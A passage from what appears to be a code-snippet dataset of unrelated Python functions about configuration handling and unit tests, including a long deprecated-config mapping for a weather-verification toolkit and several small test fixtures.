[]))\n self.ignore_blacklist = set(kwargs.pop('ignore_blacklist', []))\n\n\n super(MyTestRunner, self).__init__(*args, **kwargs)", "def test_set_defaults(self):\r\n self.assertEqual(self.config.values['option1'], 1337)\r\n self.assertNotIn('option2', self.config.values)", "def configure_misc(conf):\n if conf.get('gitignore', None) is None:\n conf['gitignore'] = yes_no(\n 'Would you like items from children gitignores to be excluded from the sync?', default=False)\n if conf['host'] == 'Client' and conf.get('sleep_time', None) is None:\n prompt = 'How long, in seconds, would you like the client to sleep before re-syncing? Enter -1 for single use.'\n conf['sleep_time'] = numeric_response(prompt, default=-1)\n return conf", "def configure(self):\n warnings.warn(\"No options to configure for \" + self.__class__.__name__)", "def mock_config(monkeypatch: Any) -> None:\n monkeypatch.setattr(\"catapi.config.ENABLE_FOO\", \"true\")\n monkeypatch.setattr(\"catapi.config.ENABLE_BAR\", \"false\")", "def nonverbose_config(config) -> Generator[None, None, None]:\n if config.option.verbose <= 0:\n yield\n else:\n saved = config.option.verbose\n config.option.verbose = 0\n yield\n config.option.verbose = saved", "def test_cancel_config(self):\n browser = Browser(self.app)\n portalURL = self.portal.absolute_url()\n browser.addHeader('Authorization', 'Basic %s:%s' % (SITE_OWNER_NAME, SITE_OWNER_PASSWORD))\n browser.open(portalURL + '/@@overview-controlpanel')\n browser.getLink('Image WatchDog settings').click()\n browser.getControl('Optimize PNG').selected = True\n browser.getControl('Enabled').selected = True\n browser.getControl('Cancel').click()\n\n registry = getUtility(IRegistry)\n settings = registry.forInterface(IImageWatchDogSettings)\n self.assertFalse(settings.optimize)\n self.assertFalse(settings.enabled)", "def initialize_options(self):\n self.all = False\n self.coverage = False\n super(test, self).initialize_options()", "def test_no_double_configuration(self):\n class A(pyperry.Base):\n def _config(cls):\n cls.add_processor('read', 'some processor')\n self.assertEqual(len(A.adapter_config['read']['_processors']), 1)\n\n class B(A): pass\n self.assertEqual(len(B.adapter_config['read']['_processors']), 1)", "async def test_skipped_already_unsilenced(self):\n self.cog.scheduler.__contains__.return_value = False\n self.cog.previous_overwrites.get.return_value = None\n\n for channel in 
(MockVoiceChannel(), MockTextChannel()):\n with self.subTest(channel=channel):\n self.assertFalse(await self.cog._unsilence(channel))\n channel.set_permissions.assert_not_called()", "def separately_configurable(self):\n return False", "def separately_configurable(self):\n return False", "def check_for_deprecated_config(config):\n\n # key is the name of the depreacted variable that is no longer allowed in any config files\n # value is a dictionary containing information about what to do with the deprecated config\n # 'sec' is the section of the config file where the replacement resides, i.e. config, dir,\n # filename_templates\n # 'alt' is the alternative name for the deprecated config. this can be a single variable name or\n # text to describe multiple variables or how to handle it. Set to None to tell the user to\n # just remove the variable\n # 'copy' is an optional item (defaults to True). set this to False if one cannot simply replace\n # the deprecated config variable name with the value in 'alt'\n # 'req' is an optional item (defaults to True). this to False to report a warning for the\n # deprecated config and allow execution to continue. this is generally no longer used\n # because we are requiring users to update the config files. if used, the developer must\n # modify the code to handle both variables accordingly\n deprecated_dict = {\n 'LOOP_BY_INIT' : {'sec' : 'config', 'alt' : 'LOOP_BY', 'copy': False},\n 'LOOP_METHOD' : {'sec' : 'config', 'alt' : 'LOOP_ORDER'},\n 'PREPBUFR_DIR_REGEX' : {'sec' : 'regex_pattern', 'alt' : None},\n 'PREPBUFR_FILE_REGEX' : {'sec' : 'regex_pattern', 'alt' : None},\n 'OBS_INPUT_DIR_REGEX' : {'sec' : 'regex_pattern', 'alt' : 'OBS_POINT_STAT_INPUT_DIR', 'copy': False},\n 'FCST_INPUT_DIR_REGEX' : {'sec' : 'regex_pattern', 'alt' : 'FCST_POINT_STAT_INPUT_DIR', 'copy': False},\n 'FCST_INPUT_FILE_REGEX' :\n {'sec' : 'regex_pattern', 'alt' : 'FCST_POINT_STAT_INPUT_TEMPLATE', 'copy': False},\n 'OBS_INPUT_FILE_REGEX' : {'sec' : 'regex_pattern', 'alt' : 'OBS_POINT_STAT_INPUT_TEMPLATE', 'copy': False},\n 'PREPBUFR_DATA_DIR' : {'sec' : 'dir', 'alt' : 'PB2NC_INPUT_DIR'},\n 'PREPBUFR_MODEL_DIR_NAME' : {'sec' : 'dir', 'alt' : 'PB2NC_INPUT_DIR', 'copy': False},\n 'OBS_INPUT_FILE_TMPL' :\n {'sec' : 'filename_templates', 'alt' : 'OBS_POINT_STAT_INPUT_TEMPLATE'},\n 'FCST_INPUT_FILE_TMPL' :\n {'sec' : 'filename_templates', 'alt' : 'FCST_POINT_STAT_INPUT_TEMPLATE'},\n 'NC_FILE_TMPL' : {'sec' : 'filename_templates', 'alt' : 'PB2NC_OUTPUT_TEMPLATE'},\n 'FCST_INPUT_DIR' : {'sec' : 'dir', 'alt' : 'FCST_POINT_STAT_INPUT_DIR'},\n 'OBS_INPUT_DIR' : {'sec' : 'dir', 'alt' : 'OBS_POINT_STAT_INPUT_DIR'},\n 'REGRID_TO_GRID' : {'sec' : 'config', 'alt' : 'POINT_STAT_REGRID_TO_GRID'},\n 'FCST_HR_START' : {'sec' : 'config', 'alt' : 'LEAD_SEQ', 'copy': False},\n 'FCST_HR_END' : {'sec' : 'config', 'alt' : 'LEAD_SEQ', 'copy': False},\n 'FCST_HR_INTERVAL' : {'sec' : 'config', 'alt' : 'LEAD_SEQ', 'copy': False},\n 'START_DATE' : {'sec' : 'config', 'alt' : 'INIT_BEG or VALID_BEG', 'copy': False},\n 'END_DATE' : {'sec' : 'config', 'alt' : 'INIT_END or VALID_END', 'copy': False},\n 'INTERVAL_TIME' : {'sec' : 'config', 'alt' : 'INIT_INCREMENT or VALID_INCREMENT', 'copy': False},\n 'BEG_TIME' : {'sec' : 'config', 'alt' : 'INIT_BEG or VALID_BEG', 'copy': False},\n 'END_TIME' : {'sec' : 'config', 'alt' : 'INIT_END or VALID_END', 'copy': False},\n 'START_HOUR' : {'sec' : 'config', 'alt' : 'INIT_BEG or VALID_BEG', 'copy': False},\n 'END_HOUR' : {'sec' : 'config', 'alt' : 'INIT_END or VALID_END', 
'copy': False},\n 'OBS_BUFR_VAR_LIST' : {'sec' : 'config', 'alt' : 'PB2NC_OBS_BUFR_VAR_LIST'},\n 'TIME_SUMMARY_FLAG' : {'sec' : 'config', 'alt' : 'PB2NC_TIME_SUMMARY_FLAG'},\n 'TIME_SUMMARY_BEG' : {'sec' : 'config', 'alt' : 'PB2NC_TIME_SUMMARY_BEG'},\n 'TIME_SUMMARY_END' : {'sec' : 'config', 'alt' : 'PB2NC_TIME_SUMMARY_END'},\n 'TIME_SUMMARY_VAR_NAMES' : {'sec' : 'config', 'alt' : 'PB2NC_TIME_SUMMARY_VAR_NAMES'},\n 'TIME_SUMMARY_TYPE' : {'sec' : 'config', 'alt' : 'PB2NC_TIME_SUMMARY_TYPE'},\n 'OVERWRITE_NC_OUTPUT' : {'sec' : 'config', 'alt' : 'PB2NC_SKIP_IF_OUTPUT_EXISTS', 'copy': False},\n 'VERTICAL_LOCATION' : {'sec' : 'config', 'alt' : 'PB2NC_VERTICAL_LOCATION'},\n 'VERIFICATION_GRID' : {'sec' : 'config', 'alt' : 'REGRID_DATA_PLANE_VERIF_GRID'},\n 'WINDOW_RANGE_BEG' : {'sec' : 'config', 'alt' : 'OBS_WINDOW_BEGIN'},\n 'WINDOW_RANGE_END' : {'sec' : 'config', 'alt' : 'OBS_WINDOW_END'},\n 'OBS_EXACT_VALID_TIME' :\n {'sec' : 'config', 'alt' : 'OBS_WINDOW_BEGIN and OBS_WINDOW_END', 'copy': False},\n 'FCST_EXACT_VALID_TIME' :\n {'sec' : 'config', 'alt' : 'FCST_WINDOW_BEGIN and FCST_WINDOW_END', 'copy': False},\n 'PCP_COMBINE_METHOD' :\n {'sec' : 'config', 'alt' : 'FCST_PCP_COMBINE_METHOD and/or OBS_PCP_COMBINE_METHOD', 'copy': False},\n 'FHR_BEG' : {'sec' : 'config', 'alt' : 'LEAD_SEQ', 'copy': False},\n 'FHR_END' : {'sec' : 'config', 'alt' : 'LEAD_SEQ', 'copy': False},\n 'FHR_INC' : {'sec' : 'config', 'alt' : 'LEAD_SEQ', 'copy': False},\n 'FHR_GROUP_BEG' : {'sec' : 'config', 'alt' : 'LEAD_SEQ_[N]', 'copy': False},\n 'FHR_GROUP_END' : {'sec' : 'config', 'alt' : 'LEAD_SEQ_[N]', 'copy': False},\n 'FHR_GROUP_LABELS' : {'sec' : 'config', 'alt' : 'LEAD_SEQ_[N]_LABEL', 'copy': False},\n 'CYCLONE_OUT_DIR' : {'sec' : 'dir', 'alt' : 'CYCLONE_OUTPUT_DIR'},\n 'ENSEMBLE_STAT_OUT_DIR' : {'sec' : 'dir', 'alt' : 'ENSEMBLE_STAT_OUTPUT_DIR'},\n 'EXTRACT_OUT_DIR' : {'sec' : 'dir', 'alt' : 'EXTRACT_TILES_OUTPUT_DIR'},\n 'GRID_STAT_OUT_DIR' : {'sec' : 'dir', 'alt' : 'GRID_STAT_OUTPUT_DIR'},\n 'MODE_OUT_DIR' : {'sec' : 'dir', 'alt' : 'MODE_OUTPUT_DIR'},\n 'MTD_OUT_DIR' : {'sec' : 'dir', 'alt' : 'MTD_OUTPUT_DIR'},\n 'SERIES_INIT_OUT_DIR' : {'sec' : 'dir', 'alt' : 'SERIES_ANALYSIS_OUTPUT_DIR'},\n 'SERIES_LEAD_OUT_DIR' : {'sec' : 'dir', 'alt' : 'SERIES_ANALYSIS_OUTPUT_DIR'},\n 'SERIES_INIT_FILTERED_OUT_DIR' :\n {'sec' : 'dir', 'alt' : 'SERIES_ANALYSIS_FILTERED_OUTPUT_DIR'},\n 'SERIES_LEAD_FILTERED_OUT_DIR' :\n {'sec' : 'dir', 'alt' : 'SERIES_ANALYSIS_FILTERED_OUTPUT_DIR'},\n 'STAT_ANALYSIS_OUT_DIR' :\n {'sec' : 'dir', 'alt' : 'STAT_ANALYSIS_OUTPUT_DIR'},\n 'TCMPR_PLOT_OUT_DIR' : {'sec' : 'dir', 'alt' : 'TCMPR_PLOT_OUTPUT_DIR'},\n 'FCST_MIN_FORECAST' : {'sec' : 'config', 'alt' : 'LEAD_SEQ_MIN'},\n 'FCST_MAX_FORECAST' : {'sec' : 'config', 'alt' : 'LEAD_SEQ_MAX'},\n 'OBS_MIN_FORECAST' : {'sec' : 'config', 'alt' : 'OBS_PCP_COMBINE_MIN_LEAD'},\n 'OBS_MAX_FORECAST' : {'sec' : 'config', 'alt' : 'OBS_PCP_COMBINE_MAX_LEAD'},\n 'FCST_INIT_INTERVAL' : {'sec' : 'config', 'alt' : None},\n 'OBS_INIT_INTERVAL' : {'sec' : 'config', 'alt' : None},\n 'FCST_DATA_INTERVAL' : {'sec' : '', 'alt' : 'FCST_PCP_COMBINE_DATA_INTERVAL'},\n 'OBS_DATA_INTERVAL' : {'sec' : '', 'alt' : 'OBS_PCP_COMBINE_DATA_INTERVAL'},\n 'FCST_IS_DAILY_FILE' : {'sec' : '', 'alt' : 'FCST_PCP_COMBINE_IS_DAILY_FILE'},\n 'OBS_IS_DAILY_FILE' : {'sec' : '', 'alt' : 'OBS_PCP_COMBINE_IS_DAILY_FILE'},\n 'FCST_TIMES_PER_FILE' : {'sec' : '', 'alt' : 'FCST_PCP_COMBINE_TIMES_PER_FILE'},\n 'OBS_TIMES_PER_FILE' : {'sec' : '', 'alt' : 'OBS_PCP_COMBINE_TIMES_PER_FILE'},\n 
'FCST_LEVEL' : {'sec' : '', 'alt' : 'FCST_PCP_COMBINE_INPUT_ACCUMS', 'copy': False},\n 'OBS_LEVEL' : {'sec' : '', 'alt' : 'OBS_PCP_COMBINE_INPUT_ACCUMS', 'copy': False},\n 'MODE_FCST_CONV_RADIUS' : {'sec' : 'config', 'alt' : 'FCST_MODE_CONV_RADIUS'},\n 'MODE_FCST_CONV_THRESH' : {'sec' : 'config', 'alt' : 'FCST_MODE_CONV_THRESH'},\n 'MODE_FCST_MERGE_FLAG' : {'sec' : 'config', 'alt' : 'FCST_MODE_MERGE_FLAG'},\n 'MODE_FCST_MERGE_THRESH' : {'sec' : 'config', 'alt' : 'FCST_MODE_MERGE_THRESH'},\n 'MODE_OBS_CONV_RADIUS' : {'sec' : 'config', 'alt' : 'OBS_MODE_CONV_RADIUS'},\n 'MODE_OBS_CONV_THRESH' : {'sec' : 'config', 'alt' : 'OBS_MODE_CONV_THRESH'},\n 'MODE_OBS_MERGE_FLAG' : {'sec' : 'config', 'alt' : 'OBS_MODE_MERGE_FLAG'},\n 'MODE_OBS_MERGE_THRESH' : {'sec' : 'config', 'alt' : 'OBS_MODE_MERGE_THRESH'},\n 'MTD_FCST_CONV_RADIUS' : {'sec' : 'config', 'alt' : 'FCST_MTD_CONV_RADIUS'},\n 'MTD_FCST_CONV_THRESH' : {'sec' : 'config', 'alt' : 'FCST_MTD_CONV_THRESH'},\n 'MTD_OBS_CONV_RADIUS' : {'sec' : 'config', 'alt' : 'OBS_MTD_CONV_RADIUS'},\n 'MTD_OBS_CONV_THRESH' : {'sec' : 'config', 'alt' : 'OBS_MTD_CONV_THRESH'},\n 'RM_EXE' : {'sec' : 'exe', 'alt' : 'RM'},\n 'CUT_EXE' : {'sec' : 'exe', 'alt' : 'CUT'},\n 'TR_EXE' : {'sec' : 'exe', 'alt' : 'TR'},\n 'NCAP2_EXE' : {'sec' : 'exe', 'alt' : 'NCAP2'},\n 'CONVERT_EXE' : {'sec' : 'exe', 'alt' : 'CONVERT'},\n 'NCDUMP_EXE' : {'sec' : 'exe', 'alt' : 'NCDUMP'},\n 'EGREP_EXE' : {'sec' : 'exe', 'alt' : 'EGREP'},\n 'ADECK_TRACK_DATA_DIR' : {'sec' : 'dir', 'alt' : 'TC_PAIRS_ADECK_INPUT_DIR'},\n 'BDECK_TRACK_DATA_DIR' : {'sec' : 'dir', 'alt' : 'TC_PAIRS_BDECK_INPUT_DIR'},\n 'MISSING_VAL_TO_REPLACE' : {'sec' : 'config', 'alt' : 'TC_PAIRS_MISSING_VAL_TO_REPLACE'},\n 'MISSING_VAL' : {'sec' : 'config', 'alt' : 'TC_PAIRS_MISSING_VAL'},\n 'TRACK_DATA_SUBDIR_MOD' : {'sec' : 'dir', 'alt' : None},\n 'ADECK_FILE_PREFIX' : {'sec' : 'config', 'alt' : 'TC_PAIRS_ADECK_TEMPLATE', 'copy': False},\n 'BDECK_FILE_PREFIX' : {'sec' : 'config', 'alt' : 'TC_PAIRS_BDECK_TEMPLATE', 'copy': False},\n 'TOP_LEVEL_DIRS' : {'sec' : 'config', 'alt' : 'TC_PAIRS_READ_ALL_FILES'},\n 'TC_PAIRS_DIR' : {'sec' : 'dir', 'alt' : 'TC_PAIRS_OUTPUT_DIR'},\n 'CYCLONE' : {'sec' : 'config', 'alt' : 'TC_PAIRS_CYCLONE'},\n 'STORM_ID' : {'sec' : 'config', 'alt' : 'TC_PAIRS_STORM_ID'},\n 'BASIN' : {'sec' : 'config', 'alt' : 'TC_PAIRS_BASIN'},\n 'STORM_NAME' : {'sec' : 'config', 'alt' : 'TC_PAIRS_STORM_NAME'},\n 'DLAND_FILE' : {'sec' : 'config', 'alt' : 'TC_PAIRS_DLAND_FILE'},\n 'TRACK_TYPE' : {'sec' : 'config', 'alt' : 'TC_PAIRS_REFORMAT_DECK'},\n 'FORECAST_TMPL' : {'sec' : 'filename_templates', 'alt' : 'TC_PAIRS_ADECK_TEMPLATE'},\n 'REFERENCE_TMPL' : {'sec' : 'filename_templates', 'alt' : 'TC_PAIRS_BDECK_TEMPLATE'},\n 'TRACK_DATA_MOD_FORCE_OVERWRITE' :\n {'sec' : 'config', 'alt' : 'TC_PAIRS_SKIP_IF_REFORMAT_EXISTS', 'copy': False},\n 'TC_PAIRS_FORCE_OVERWRITE' : {'sec' : 'config', 'alt' : 'TC_PAIRS_SKIP_IF_OUTPUT_EXISTS', 'copy': False},\n 'GRID_STAT_CONFIG' : {'sec' : 'config', 'alt' : 'GRID_STAT_CONFIG_FILE'},\n 'MODE_CONFIG' : {'sec' : 'config', 'alt': 'MODE_CONFIG_FILE'},\n 'FCST_PCP_COMBINE_INPUT_LEVEL': {'sec': 'config', 'alt' : 'FCST_PCP_COMBINE_INPUT_ACCUMS'},\n 'OBS_PCP_COMBINE_INPUT_LEVEL': {'sec': 'config', 'alt' : 'OBS_PCP_COMBINE_INPUT_ACCUMS'},\n 'TIME_METHOD': {'sec': 'config', 'alt': 'LOOP_BY', 'copy': False},\n 'MODEL_DATA_DIR': {'sec': 'dir', 'alt': 'EXTRACT_TILES_GRID_INPUT_DIR'},\n 'STAT_LIST': {'sec': 'config', 'alt': 'SERIES_ANALYSIS_STAT_LIST'},\n 'NLAT': {'sec': 'config', 'alt': 
'EXTRACT_TILES_NLAT'},\n 'NLON': {'sec': 'config', 'alt': 'EXTRACT_TILES_NLON'},\n 'DLAT': {'sec': 'config', 'alt': 'EXTRACT_TILES_DLAT'},\n 'DLON': {'sec': 'config', 'alt': 'EXTRACT_TILES_DLON'},\n 'LON_ADJ': {'sec': 'config', 'alt': 'EXTRACT_TILES_LON_ADJ'},\n 'LAT_ADJ': {'sec': 'config', 'alt': 'EXTRACT_TILES_LAT_ADJ'},\n 'OVERWRITE_TRACK': {'sec': 'config', 'alt': 'EXTRACT_TILES_OVERWRITE_TRACK'},\n 'BACKGROUND_MAP': {'sec': 'config', 'alt': 'SERIES_ANALYSIS_BACKGROUND_MAP'},\n 'GFS_FCST_FILE_TMPL': {'sec': 'filename_templates', 'alt': 'FCST_EXTRACT_TILES_INPUT_TEMPLATE'},\n 'GFS_ANLY_FILE_TMPL': {'sec': 'filename_templates', 'alt': 'OBS_EXTRACT_TILES_INPUT_TEMPLATE'},\n 'SERIES_BY_LEAD_FILTERED_OUTPUT_DIR': {'sec': 'dir', 'alt': 'SERIES_ANALYSIS_FILTERED_OUTPUT_DIR'},\n 'SERIES_BY_INIT_FILTERED_OUTPUT_DIR': {'sec': 'dir', 'alt': 'SERIES_ANALYSIS_FILTERED_OUTPUT_DIR'},\n 'SERIES_BY_LEAD_OUTPUT_DIR': {'sec': 'dir', 'alt': 'SERIES_ANALYSIS_OUTPUT_DIR'},\n 'SERIES_BY_INIT_OUTPUT_DIR': {'sec': 'dir', 'alt': 'SERIES_ANALYSIS_OUTPUT_DIR'},\n 'SERIES_BY_LEAD_GROUP_FCSTS': {'sec': 'config', 'alt': 'SERIES_ANALYSIS_GROUP_FCSTS'},\n 'SERIES_ANALYSIS_BY_LEAD_CONFIG_FILE': {'sec': 'config', 'alt': 'SERIES_ANALYSIS_CONFIG_FILE'},\n 'SERIES_ANALYSIS_BY_INIT_CONFIG_FILE': {'sec': 'config', 'alt': 'SERIES_ANALYSIS_CONFIG_FILE'},\n 'ENSEMBLE_STAT_MET_OBS_ERROR_TABLE': {'sec': 'config', 'alt': 'ENSEMBLE_STAT_MET_OBS_ERR_TABLE'},\n 'VAR_LIST': {'sec': 'config', 'alt': 'BOTH_VAR<n>_NAME BOTH_VAR<n>_LEVELS or SERIES_ANALYSIS_VAR_LIST', 'copy': False},\n 'SERIES_ANALYSIS_VAR_LIST': {'sec': 'config', 'alt': 'BOTH_VAR<n>_NAME BOTH_VAR<n>_LEVELS', 'copy': False},\n 'EXTRACT_TILES_VAR_LIST': {'sec': 'config', 'alt': ''},\n 'STAT_ANALYSIS_LOOKIN_DIR': {'sec': 'dir', 'alt': 'MODEL1_STAT_ANALYSIS_LOOKIN_DIR'},\n 'VALID_HOUR_METHOD': {'sec': 'config', 'alt': None},\n 'VALID_HOUR_BEG': {'sec': 'config', 'alt': None},\n 'VALID_HOUR_END': {'sec': 'config', 'alt': None},\n 'VALID_HOUR_INCREMENT': {'sec': 'config', 'alt': None},\n 'INIT_HOUR_METHOD': {'sec': 'config', 'alt': None},\n 'INIT_HOUR_BEG': {'sec': 'config', 'alt': None},\n 'INIT_HOUR_END': {'sec': 'config', 'alt': None},\n 'INIT_HOUR_INCREMENT': {'sec': 'config', 'alt': None},\n 'STAT_ANALYSIS_CONFIG': {'sec': 'config', 'alt': 'STAT_ANALYSIS_CONFIG_FILE'},\n 'JOB_NAME': {'sec': 'config', 'alt': 'STAT_ANALYSIS_JOB_NAME'},\n 'JOB_ARGS': {'sec': 'config', 'alt': 'STAT_ANALYSIS_JOB_ARGS'},\n 'FCST_LEAD': {'sec': 'config', 'alt': 'FCST_LEAD_LIST'},\n 'FCST_VAR_NAME': {'sec': 'config', 'alt': 'FCST_VAR_LIST'},\n 'FCST_VAR_LEVEL': {'sec': 'config', 'alt': 'FCST_VAR_LEVEL_LIST'},\n 'OBS_VAR_NAME': {'sec': 'config', 'alt': 'OBS_VAR_LIST'},\n 'OBS_VAR_LEVEL': {'sec': 'config', 'alt': 'OBS_VAR_LEVEL_LIST'},\n 'REGION': {'sec': 'config', 'alt': 'VX_MASK_LIST'},\n 'INTERP': {'sec': 'config', 'alt': 'INTERP_LIST'},\n 'INTERP_PTS': {'sec': 'config', 'alt': 'INTERP_PTS_LIST'},\n 'CONV_THRESH': {'sec': 'config', 'alt': 'CONV_THRESH_LIST'},\n 'FCST_THRESH': {'sec': 'config', 'alt': 'FCST_THRESH_LIST'},\n 'LINE_TYPE': {'sec': 'config', 'alt': 'LINE_TYPE_LIST'},\n 'STAT_ANALYSIS_DUMP_ROW_TMPL': {'sec': 'filename_templates', 'alt': 'STAT_ANALYSIS_DUMP_ROW_TEMPLATE'},\n 'STAT_ANALYSIS_OUT_STAT_TMPL': {'sec': 'filename_templates', 'alt': 'STAT_ANALYSIS_OUT_STAT_TEMPLATE'},\n 'PLOTTING_SCRIPTS_DIR': {'sec': 'dir', 'alt': 'MAKE_PLOTS_SCRIPTS_DIR'},\n 'STAT_FILES_INPUT_DIR': {'sec': 'dir', 'alt': 'MAKE_PLOTS_INPUT_DIR'},\n 'PLOTTING_OUTPUT_DIR': {'sec': 'dir', 'alt': 
'MAKE_PLOTS_OUTPUT_DIR'},\n 'VERIF_CASE': {'sec': 'config', 'alt': 'MAKE_PLOTS_VERIF_CASE'},\n 'VERIF_TYPE': {'sec': 'config', 'alt': 'MAKE_PLOTS_VERIF_TYPE'},\n 'PLOT_TIME': {'sec': 'config', 'alt': 'DATE_TIME'},\n 'MODEL<n>_NAME': {'sec': 'config', 'alt': 'MODEL<n>'},\n 'MODEL<n>_OBS_NAME': {'sec': 'config', 'alt': 'MODEL<n>_OBTYPE'},\n 'MODEL<n>_STAT_DIR': {'sec': 'dir', 'alt': 'MODEL<n>_STAT_ANALYSIS_LOOKIN_DIR'},\n 'MODEL<n>_NAME_ON_PLOT': {'sec': 'config', 'alt': 'MODEL<n>_REFERENCE_NAME'},\n 'REGION_LIST': {'sec': 'config', 'alt': 'VX_MASK_LIST'},\n 'PLOT_STATS_LIST': {'sec': 'config', 'alt': 'MAKE_PLOT_STATS_LIST'},\n 'CI_METHOD': {'sec': 'config', 'alt': 'MAKE_PLOTS_CI_METHOD'},\n 'VERIF_GRID': {'sec': 'config', 'alt': 'MAKE_PLOTS_VERIF_GRID'},\n 'EVENT_EQUALIZATION': {'sec': 'config', 'alt': 'MAKE_PLOTS_EVENT_EQUALIZATION'},\n 'MTD_CONFIG': {'sec': 'config', 'alt': 'MTD_CONFIG_FILE'},\n 'CLIMO_GRID_STAT_INPUT_DIR': {'sec': 'dir', 'alt': 'GRID_STAT_CLIMO_MEAN_INPUT_DIR'},\n 'CLIMO_GRID_STAT_INPUT_TEMPLATE': {'sec': 'filename_templates', 'alt': 'GRID_STAT_CLIMO_MEAN_INPUT_TEMPLATE'},\n 'CLIMO_POINT_STAT_INPUT_DIR': {'sec': 'dir', 'alt': 'POINT_STAT_CLIMO_MEAN_INPUT_DIR'},\n 'CLIMO_POINT_STAT_INPUT_TEMPLATE': {'sec': 'filename_templates', 'alt': 'POINT_STAT_CLIMO_MEAN_INPUT_TEMPLATE'},\n 'GEMPAKTOCF_CLASSPATH': {'sec': 'exe', 'alt': 'GEMPAKTOCF_JAR', 'copy': False},\n 'CUSTOM_INGEST_<n>_OUTPUT_DIR': {'sec': 'dir', 'alt': 'PY_EMBED_INGEST_<n>_OUTPUT_DIR'},\n 'CUSTOM_INGEST_<n>_OUTPUT_TEMPLATE': {'sec': 'filename_templates', 'alt': 'PY_EMBED_INGEST_<n>_OUTPUT_TEMPLATE'},\n 'CUSTOM_INGEST_<n>_OUTPUT_GRID': {'sec': 'config', 'alt': 'PY_EMBED_INGEST_<n>_OUTPUT_GRID'},\n 'CUSTOM_INGEST_<n>_SCRIPT': {'sec': 'config', 'alt': 'PY_EMBED_INGEST_<n>_SCRIPT'},\n 'CUSTOM_INGEST_<n>_TYPE': {'sec': 'config', 'alt': 'PY_EMBED_INGEST_<n>_TYPE'},\n 'TC_STAT_RUN_VIA': {'sec': 'config', 'alt': 'TC_STAT_CONFIG_FILE',\n 'copy': False},\n 'TC_STAT_CMD_LINE_JOB': {'sec': 'config', 'alt': 'TC_STAT_JOB_ARGS'},\n 'TC_STAT_JOBS_LIST': {'sec': 'config', 'alt': 'TC_STAT_JOB_ARGS'},\n 'EXTRACT_TILES_OVERWRITE_TRACK': {'sec': 'config',\n 'alt': 'EXTRACT_TILES_SKIP_IF_OUTPUT_EXISTS',\n 'copy': False},\n 'EXTRACT_TILES_PAIRS_INPUT_DIR': {'sec': 'dir',\n 'alt': 'EXTRACT_TILES_STAT_INPUT_DIR',\n 'copy': False},\n 'EXTRACT_TILES_FILTERED_OUTPUT_TEMPLATE': {'sec': 'filename_template',\n 'alt': 'EXTRACT_TILES_STAT_INPUT_TEMPLATE',},\n 'EXTRACT_TILES_GRID_INPUT_DIR': {'sec': 'dir',\n 'alt': 'FCST_EXTRACT_TILES_INPUT_DIR'\n 'and '\n 'OBS_EXTRACT_TILES_INPUT_DIR',\n 'copy': False},\n 'SERIES_ANALYSIS_FILTER_OPTS': {'sec': 'config',\n 'alt': 'TC_STAT_JOB_ARGS',\n 'copy': False},\n 'SERIES_ANALYSIS_INPUT_DIR': {'sec': 'dir',\n 'alt': 'FCST_SERIES_ANALYSIS_INPUT_DIR '\n 'and '\n 'OBS_SERIES_ANALYSIS_INPUT_DIR'},\n 'FCST_SERIES_ANALYSIS_TILE_INPUT_TEMPLATE': {'sec': 'filename_templates',\n 'alt': 'FCST_SERIES_ANALYSIS_INPUT_TEMPLATE '},\n 'OBS_SERIES_ANALYSIS_TILE_INPUT_TEMPLATE': {'sec': 'filename_templates',\n 'alt': 'OBS_SERIES_ANALYSIS_INPUT_TEMPLATE '},\n 'EXTRACT_TILES_STAT_INPUT_DIR': {'sec': 'dir',\n 'alt': 'EXTRACT_TILES_TC_STAT_INPUT_DIR',},\n 'EXTRACT_TILES_STAT_INPUT_TEMPLATE': {'sec': 'filename_templates',\n 'alt': 'EXTRACT_TILES_TC_STAT_INPUT_TEMPLATE',},\n 'SERIES_ANALYSIS_STAT_INPUT_DIR': {'sec': 'dir',\n 'alt': 'SERIES_ANALYSIS_TC_STAT_INPUT_DIR', },\n 'SERIES_ANALYSIS_STAT_INPUT_TEMPLATE': {'sec': 'filename_templates',\n 'alt': 'SERIES_ANALYSIS_TC_STAT_INPUT_TEMPLATE', },\n }\n\n # template '' : {'sec' : '', 
'alt' : '', 'copy': True},\n\n logger = config.logger\n\n # create list of errors and warnings to report for deprecated configs\n e_list = []\n w_list = []\n all_sed_cmds = []\n\n for old, depr_info in deprecated_dict.items():\n if isinstance(depr_info, dict):\n\n # check if <n> is found in the old item, use regex to find variables if found\n if '<n>' in old:\n old_regex = old.replace('<n>', r'(\\d+)')\n indices = find_indices_in_config_section(old_regex,\n config,\n index_index=1).keys()\n for index in indices:\n old_with_index = old.replace('<n>', index)\n if depr_info['alt']:\n alt_with_index = depr_info['alt'].replace('<n>', index)\n else:\n alt_with_index = ''\n\n handle_deprecated(old_with_index, alt_with_index, depr_info,\n config, all_sed_cmds, w_list, e_list)\n else:\n handle_deprecated(old, depr_info['alt'], depr_info,\n config, all_sed_cmds, w_list, e_list)\n\n\n # check all templates and error if any deprecated tags are used\n # value of dict is replacement tag, set to None if no replacement exists\n # deprecated tags: region (replace with basin)\n deprecated_tags = {'region' : 'basin'}\n template_vars = config.keys('config')\n template_vars = [tvar for tvar in template_vars if tvar.endswith('_TEMPLATE')]\n for temp_var in template_vars:\n template = config.getraw('filename_templates', temp_var)\n tags = get_tags(template)\n\n for depr_tag, replace_tag in deprecated_tags.items():\n if depr_tag in tags:\n e_msg = 'Deprecated tag {{{}}} found in {}.'.format(depr_tag,\n temp_var)\n if replace_tag is not None:\n e_msg += ' Replace with {{{}}}'.format(replace_tag)\n\n e_list.append(e_msg)\n\n # if any warning exist, report them\n if w_list:\n for warning_msg in w_list:\n logger.warning(warning_msg)\n\n # if any errors exist, report them and exit\n if e_list:\n logger.error('DEPRECATED CONFIG ITEMS WERE FOUND. ' +\\\n 'PLEASE REMOVE/REPLACE THEM FROM CONFIG FILES')\n for error_msg in e_list:\n logger.error(error_msg)\n return False, all_sed_cmds\n\n return True, []", "def ignores(self):\n pass # make ignore_tags unaccessible", "def _should_profile_production_default():\n return False", "def test_missing_settings(monkeypatch) -> None: # noqa: TYP001\n monkeypatch.delattr(django_settings, 'SWAGGER_TESTER')\n SwaggerTesterSettings()", "def test_exclude_include_overlapping_resolved_with_include_for_configitem():\n\n @mc_config(ef, load_now=True)\n def config(rt):\n with ItemWithAA() as cr:\n cr.aa = 1\n with item(mc_include=[g_dev12, pp, dev2], mc_exclude=[g_dev23]) as it:\n it.setattr('anattr', pp=1, g_dev12_3=2)\n it.setattr('b', pp=1, dev2=0)\n it.setattr('anotherattr', default=111)\n return cr\n\n cr = config(prod).ItemWithAA\n assert not cr.item\n assert compare_json(cr, _include_exclude_for_configitem_expected_json, test_excluded=True)\n\n cr = config(dev1).ItemWithAA\n assert cr.item\n\n cr = 